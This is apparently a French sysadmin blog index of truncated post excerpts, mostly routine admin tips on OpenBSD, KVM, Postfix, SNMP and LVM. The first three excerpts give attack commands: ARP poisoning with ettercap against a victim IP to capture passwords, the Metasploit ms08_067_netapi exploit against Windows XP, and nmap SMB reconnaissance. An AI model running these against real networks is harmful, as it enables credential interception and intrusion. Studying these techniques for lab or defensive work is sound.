Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle… On active l’IP forwarding : $ sudo sysctl -w net.ipv4.ip_forward=1 On lance ettercap : $ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/ Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en […]

Attaquer un Windows XP avec Metasploit…

Lancement de metasploit : $ sudo msfconsole Utilisation de l’exploit « ms08_067_netapi » : msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > On affiche les options : msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE […]

Traquer Windows XP avec nmap…

… avec l’utilisation des scripts nmap smb-os-discovery.nse et smb-system-info.nse On lance nmap (ici depuis la distribution kali-linux) afin de scanner notre plage IP : root@kali# cd /usr/share/nmap root@kali:/usr/share/nmap# nmap -sV –script=scripts/smb-os-discovery.nse,scripts/smb-system-info.nse 192.168.0.0/24 Starting Nmap 6.25 ( http://nmap.org ) at 2014-11-21 10:04 CET … Nmap scan report for 192.168.0.53 Host is up (0.0011s latency). Not shown: […]

OpenBSD 5.4, WordPress et Nginx

Voici comment installer WordPress sur OpenBSD. Pour installer un package, on renseigne la variable PKG_PATH : $ sudo export PKG_PATH=ftp://ftp.openbsd.org/pub/OpenBSD/5.4/packages/amd64/ On installe php-fpm qui ajoutera les dépendances (notamment php-5.3.27) : $ sudo pkg_add php-fpm Ambiguous: choose dependency for php-fpm-5.3.27: a 0: php-5.3.27 1: php-5.3.27 Your choice: 1 php-fpm-5.3.27:libiconv-1.14p0: ok php-fpm-5.3.27:libxml-2.9.0p0: ok php-fpm-5.3.27:gettext-0.18.2p3: ok php-fpm-5.3.27:femail-0.98: ok […]

[Debian Wheezy] Spamassassin prend son temps! avec un DNSBL qui ne répond plus…

Après une installation classique d’un serveur SMTP (sur une Wheezy avec les paquets actuels) avec (donc) Postfix 2.9.6-2, Amavis-new 1:2.7.1-2, Clamav 0.97.8+dfsg-1 et Spamassassin 3.3.2 (+pyzor/razo2/DCC), je me rends compte que les messages mettent plus de 4 secondes avant d’être délivrés (de façon asynchrone tout de même).. En mode Debug on peut voir les pourcentages […]

[Debian Wheezy] Surveille ta mailq!

Voici comment superviser simplement la mailq de votre serveur SMTP (Postix par exemple). Installer le serveur snmp : apt-get install snmpd Rajouter dans /etc/snmp/snmpd.conf (w.x.y.z est l’IP du serveur de supervision) les 2 lignes suivantes : rocommunity public w.x.y.z extend mailqstats /etc/snmp/mailqstats.sh Vous pouvez changer le community « public » pour un tout autre nom… Créer le […]

[BSD] invité OpenBSD 5.4 sur un hôte KVM

Création du volume logique : # lvcreate -n musclor -L50G virtvol Logical volume « musclor » created Téléchargement de l’ISO : # cd /isos/ # wget http://mirrors.ircam.fr/pub/OpenBSD/5.4/amd64/install54.iso Installation avec virt-install : # virt-install –name=musclor –ram=4096 –vcpus=2 –disk path=/dev/virtvol/musclor,bus=virtio –vnc –cdrom=/isos/install54.iso –os-type=unix –os-variant=openbsd4 –network=bridge:br0,model=virtio –hvm –keymap=fr Attention : pour bénéficier de virtio, il est indispensable de l’indiquer explicitement! Pour […]

[BSD] KVM, virtio et FreeBSD 9.1

Sur une installation de FreeBSD 9.1 (plutôt lente!) sur une VM KVM… voici comment utiliser virtio : # pkg_add http://people.freebsd.org/~kuriyama/virtio/9.1/virtio-kmod-9.1-0.250249.tbz Fetching http://people.freebsd.org/~kuriyama/virtio/9.1/virtio-kmod-9.1-0.250249.tbz… Done. vérifier les mises à jour : http://people.freebsd.org/~kuriyama/virtio/9.1/ A l’issue de l’installation, les indications sont clairement affichés.. à savoir (en français) : création du fichier /boot/loader.conf avec dedans : virtio_load= »YES » virtio_pci_load= »YES » virtio_blk_load= »YES » if_vtnet_load= »YES » […]

Openldap sur debian squeeze : autoremove des logs bdb

Sachant que les bases sont situées dans /var/lib/ldap, rajoutez dans /var/lib/ldap/DB_CONFIG de : set_flags DB_LOG_AUTOREMOVE D’ailleurs voici un exemple de contenu pour ce fichier : /var/lib/ldap# cat DB_CONFIG set_cachesize 0 2097152 0 set_lk_max_objects 1500 set_lk_max_locks 1500 set_lk_max_lockers 1500 set_flags DB_LOG_AUTOREMOVE Installation d’outils de gestion des bases bdb : # aptitude install db4.8-util Les NOUVEAUX paquets […]

DD, LVM et KVM… en vrac

Quelques trucs en vrac… simple sauvegarde de VM (volume logique) avec dd liste des volumes logiques : # lvs LV VG Attr LSize Origin Snap% Move Log Copy% Convert maja virtvol -wi-a- 8,00g maja-swap virtvol -wi-a- 2,00g raton virtvol -wi-ao 8,00g raton-swap virtvol -wi-ao 1,00g copie : # dd if=/dev/virtvol/maja of=maja.bak bs=512K restauration : # […]